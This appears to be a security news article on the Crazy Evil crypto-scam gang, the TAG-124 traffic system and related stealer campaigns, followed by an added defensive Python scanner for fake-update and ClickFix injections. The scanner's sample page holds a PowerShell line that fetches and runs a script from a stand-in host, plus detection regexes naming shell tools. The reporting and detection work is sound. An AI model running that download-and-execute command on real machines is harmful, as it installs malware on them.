![Crypto Malware](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTQCp_Bbsn6xY3bxwBfTSoTjxPMIFn1Gr-HUwsZrb8XXa39_XwdwvRB1pow5gCvlUMTsPB_YEOIFTzHfYYhHN5RKcoT008O5fUzH8AYlTAlp_SF0F6OvH-LWRv9wioFROToxLTtb_Kdg4x_xL1kAmrmt7g_UD4OKRipfiuQWX0qjNuDudd7-mUYV7h-w2N/s728-rw-e365/crypto-malware.png)
A Russian-speaking cybercriminal gang known as Crazy Evil has been linked to more than 10 active social media scams that use a wide range of tailored lures to deceive victims into installing malware such as StealC, Atomic macOS Stealer (aka AMOS), and Angel Drainer.
"Specializing in identity fraud, cryptocurrency theft, and information-stealing malware, Crazy Evil employs a well-coordinated network of traffers, social engineering experts tasked with redirecting legitimate traffic to malicious phishing pages," Recorded Future said in its analysis.
The cryptoscam group's use of a diverse malware arsenal indicates that the threat actors target both Windows and macOS systems, posing a risk to the decentralized finance ecosystem.
Crazy Evil is assessed to have been active since at least 2021, functioning primarily as a traffer team that redirects legitimate traffic to malicious landing pages operated by other criminal crews. It is allegedly operated by a threat actor known on Telegram as @AbrahamCrazyEvil, and it serves more than 4,800 subscribers on the messaging platform (@CrazyEvilCorp) at the time of writing.
"They monetize traffic to these botnet operators, who intend to compromise users either broadly or selectively, in a specific region or on a specific operating system," French cybersecurity company Sekoia noted in a 2022 deep-dive report on traffer services.

"Therefore, the main issue facing traffers is to generate high-quality traffic without bots, not detected or analyzed by security vendors, and ultimately filtered by traffic type. In other words, it is a form of lead generation."
Unlike other scams built mainly around counterfeit shopping sites that facilitate fraudulent transactions, Crazy Evil focuses on the theft of digital assets, including non-fungible tokens (NFTs), cryptocurrency, payment cards, and online banking accounts. It is estimated to have generated more than $5 million in illicit revenue and to have compromised tens of thousands of devices worldwide.
The gang has gained new prominence following the exit scams of two other cybercrime groups, Markopolo and CryptoLove.
"Crazy Evil explicitly victimizes the cryptocurrency space with bespoke spear-phishing lures," Recorded Future said. "Crazy Evil traffers take days or weeks of reconnaissance time, identifying targets and initiating engagement."
Besides orchestrating attack chains that deliver information stealers and wallet drainers, the group's administrators provide manuals and guidance on crypters for malicious payloads, clipper services, and an affiliate structure.
![Malware](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiShjKjy1s9MLPk9DwiK7rip07A160Ujls-gH8e9H4WaNz3zYA0OvxRxiCdf0woUSzCuEnGyXSov3gh1rEprEjGOgXRmvMqJFcJHktkPEOWUzmX99qpTAaVMmX_0z8heOtr6LU1qrLBUCtRLeNX7V9PRlW3LfedAI1bY4GBnElHKEJLq-NFOdYHmAbGnUxQ/s728-rw-e365/malware.png)
Crazy Evil is the second cybercrime group after Telekopye to be exposed in recent years that focuses on Telegram. Newly recruited affiliates are directed by an actor-controlled Telegram bot to other private channels:

- Payments, which announces the revenue of the traffers
- Logbar, which provides an audit trail of information-stealer attacks, including the data stolen
- Info, which provides administrative and technical updates
- Global Chat, which serves as the main communication space for discussions ranging from work to memes
The cybercrime group has been found to comprise six sub-teams, AVLAND, TYPED, DELAND, ZOOMLAND, DEFI, and KEVLAND, each of which is responsible for a specific scam that dupes victims into installing the tools from fake websites:

- AVLAND (aka AVS | RG or AVENGE), which uses job offer and investment scams to propagate the StealC and AMOS stealers under the guise of a Web3 communication tool named Voxium ("voxiumcalls[.]com")
- TYPED, which propagates the AMOS stealer under the guise of an artificial intelligence software named TyperDex ("typerdex[.]ai")
- DELAND, which propagates the AMOS stealer under the guise of a community platform named DeMeet ("demeet[.]app")
- ZOOMLAND, which uses generic scams impersonating Zoom and WeChat ("app-whechat[.]com") to propagate the AMOS stealer
- DEFI, which propagates the AMOS stealer under the guise of a digital asset management platform named Selenium Finance ("selenium[.]fi")
- KEVLAND, which propagates the AMOS stealer under the guise of an AI-enhanced virtual meeting software named Gatherum ("gatherum[.]ca")
"As Crazy Evil continues to achieve success, other cybercriminal entities are likely to emulate its methods, compelling security teams to remain perpetually vigilant to prevent widespread breaches and the erosion of trust within the cryptocurrency, gaming, and software sectors," Recorded Future said.
The development comes as the cybersecurity company shed light on a traffic distribution system (TDS) dubbed TAG-124, which overlaps with activity clusters tracked as LandUpdate808, 404 TDS, KongTuke, and Chaya_002. Multiple threat actors, including those behind Rhysida ransomware, Interlock ransomware, TA866/Asylum Ambuscade, SocGholish, D3F@CK Loader, and TA582, have been observed using the TDS in their initial infection sequences.

"TAG-124 comprises a network of compromised WordPress sites, actor-controlled payload servers, a central server, a suspected management server, an additional panel, and other components," Recorded Future said. "If visitors meet specific criteria, the compromised WordPress sites display fake Google Chrome update landing pages, ultimately leading to malware infections."
![Victim](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggK4Q0R1VXSSbxatqFogsY900RFcT7TFHbn9pqXR-i5cbfq3u3xyiDeIeHSpv-Cs2TbhbbL0oBLvICs3NoEhgAnJD68zrCmo6pZGhPAPp3rCgd0T-yR5mgXLEd51dvQG9C7UciX2PmNinQac1mNlgDBbziRwTKoc5m-HkIK-nlwT7OcvYkcEqC4t9T-v2c/s728-rw-e365/victim.png)
Recorded Future also noted that the shared use of TAG-124 reinforces the connection between the Rhysida and Interlock ransomware strains, and that recent TAG-124 campaigns have employed the ClickFix technique, which instructs visitors to execute a command that has already been copied to their clipboard in order to start the malware infection.

Some of the payloads deployed as part of the attacks include Remcos RAT and CleanUpLoader (aka Broomstick or Oyster), the latter of which is used to deliver Rhysida and Interlock ransomware.

The compromise of more than 10,000 WordPress sites has also been found to serve as a distribution channel for AMOS and SocGholish as part of what has been described as a client-side attack.

"The JavaScript loaded in the user's browser generates the fake page in an iframe," said Himanshu Anand of c/side. "The attackers use outdated WordPress versions and plugins to make detection more difficult for websites without client-side monitoring tools."
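The three client-side behaviours described above (a fake Chrome update page injected into a compromised WordPress site, a ClickFix page that writes a command to the clipboard and tells the visitor to run it, and an injected iframe pointing off-site) can all be spotted from the served HTML. The scanner below is an added example written for this page; it is not code from Recorded Future, c/side, or any of the vendors mentioned. The three sample pages are constructed, the regexes are assumptions about how such injections are usually phrased rather than published signatures, and the verdict rule is a heuristic, so treat hits as triage leads, not proof.

```python
"""Heuristic scan of served HTML for fake-update, ClickFix and off-site iframe injections.

Added example for this article. Sample pages are constructed; the patterns are
assumptions, not vendor-published indicators.
"""
import re
from urllib.parse import urlparse

# Constructed sample pages (not real captures).
CLEAN_PAGE = """<html><body><h1>Welcome</h1>
<script src="/wp-content/themes/site/js/menu.js"></script></body></html>"""

FAKE_UPDATE_PAGE = """<html><body>
<div>Your Google Chrome browser needs to be updated</div>
<script>var f=document.createElement('iframe');f.style.display='none';
f.src='https://cdn-example-update.invalid/chrome/update.html';document.body.appendChild(f);</script>
</body></html>"""

CLICKFIX_PAGE = """<html><body>
<p>To verify you are human, press Win+R, then Ctrl+V and hit Enter.</p>
<script>navigator.clipboard.writeText("powershell -w hidden -c iwr https://lure.invalid/x.ps1 | iex");</script>
</body></html>"""

# (name, regex) pairs; each encodes an assumption about typical lure wording or JS.
HEURISTICS = [
    ("fake_browser_update", re.compile(r"(chrome|firefox|edge)[^<]{0,40}(update|out of date)", re.I)),
    ("hidden_iframe", re.compile(r"<iframe[^>]*(display\s*:\s*none|hidden)|createElement\(['\"]iframe['\"]\)", re.I)),
    ("clipboard_write", re.compile(r"navigator\.clipboard\.writeText|execCommand\(['\"]copy['\"]\)", re.I)),
    ("run_dialog_instruction", re.compile(r"win\s*\+\s*r|ctrl\s*\+\s*v|press\s+enter", re.I)),
    ("shell_in_clipboard", re.compile(r"powershell|mshta|cmd(\.exe)?\s*/c|\biex\b|\biwr\b", re.I)),
]


def external_origins(html, site_host):
    """Hosts loaded via script/iframe src (static or JS-assigned) that differ from the site's own host."""
    hosts = set()
    for m in re.finditer(r"<(?:script|iframe)[^>]+src=['\"]([^'\"]+)['\"]", html, re.I):
        h = urlparse(m.group(1)).hostname
        if h and h != site_host:
            hosts.add(h)
    for m in re.finditer(r"\.src\s*=\s*['\"](https?://[^'\"]+)['\"]", html, re.I):
        h = urlparse(m.group(1)).hostname
        if h and h != site_host:
            hosts.add(h)
    return hosts


def scan_page(html, site_host):
    """Return a dict with a verdict, the heuristics that fired, and any off-site script/iframe origins."""
    hits = [name for name, rx in HEURISTICS if rx.search(html)]
    externals = external_origins(html, site_host)
    # Verdict rule (assumption): ClickFix = clipboard write plus a run-dialog cue or shell keyword;
    # fake update = update lure plus a hidden iframe or an off-site origin.
    clickfix = "clipboard_write" in hits and (
        "run_dialog_instruction" in hits or "shell_in_clipboard" in hits)
    fake_update = "fake_browser_update" in hits and ("hidden_iframe" in hits or bool(externals))
    verdict = "clickfix" if clickfix else "fake_update" if fake_update else "clean"
    return {"verdict": verdict, "hits": hits, "external_origins": sorted(externals)}


if __name__ == "__main__":
    for label, page in [("clean", CLEAN_PAGE), ("update", FAKE_UPDATE_PAGE), ("clickfix", CLICKFIX_PAGE)]:
        print(label, scan_page(page, "example.org"))
```

Run it against HTML fetched with the same User-Agent, referrer and geography as a real visitor, since a TDS like the one described above only serves the lure to visitors meeting its criteria; a crawler that fetches the page with a bare client will usually see the clean version.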
Furthermore, threat actors have been observed exploiting the trust associated with popular platforms such as GitHub to host malicious installers that lead to other payloads such as Lumma Stealer, SectopRAT, Vidar Stealer, and Cobalt Strike Beacon.
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNw0L5p7yo5sLsUt7JtWysvGF_Mrs2ATuhzpBGBRzxOFHzQGRH-p9y5PzAczA1FTSv9HKCeMaw54zBocvNZ_-2yltGyby71e24rmoJUSjr3avCBdr5byfbX_jE4cuuxZMIxqUiTP-KxZ8G-tEdlZV7N-4j25afvqbZdHEe-oW7UGdi8jRAS-JMufUu3uPN/s728-rw-e365/sec.png)
The activity observed by Trend Micro shows tactical overlap with a threat actor referred to as Stargazer Goblin, which has a track record of using GitHub repositories for payload distribution. A crucial difference, however, is that this infection chain starts with compromised websites that redirect to malicious GitHub release links.

"The distribution methods of Lumma Stealer continue to evolve, with the threat actors now using GitHub repositories to host malware," said Trend Micro security researchers Buddy Tancio, Fe Cureg, and Jovit Samaniego.

"The malware-as-a-service (MaaS) model provides malicious actors with an accessible means of executing complex cyberattacks and achieving their malicious goals, facilitating the distribution of threats such as Lumma Stealer."